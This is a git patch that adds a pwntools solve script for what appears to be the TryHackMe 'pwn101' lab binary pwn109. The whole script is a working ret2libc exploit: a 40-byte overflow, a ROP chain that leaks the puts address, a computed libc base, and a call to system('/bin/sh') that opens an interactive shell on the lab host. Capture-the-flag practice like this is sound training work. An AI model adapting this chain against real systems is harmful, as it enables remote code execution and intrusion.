From ecb666932f4cac8797d3026a07c6ba0a8fb4173c Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Tue, 29 Oct 2024 20:12:25 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn109/a.py | 41 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 thm_pwn101/pwn109/a.py

diff --git a/thm_pwn101/pwn109/a.py b/thm_pwn101/pwn109/a.py
new file mode 100644
index 0000000..51a746e
--- /dev/null
+++ b/thm_pwn101/pwn109/a.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn109", checksec=False)
+# r = process()
+r = remote("10.10.42.182", 9009)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4012a3
+
+# buf
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.main)
+s(buf)
+
+# leak
+r.recvuntil(b"This time")
+r.recvline()
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc = puts - 0x80aa0
+log.info("libc: %#x", libc)
+system = libc + 0x4f550
+sh = libc + 0x1b3e1a
+
+# pop
+buf = b"A"*40
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file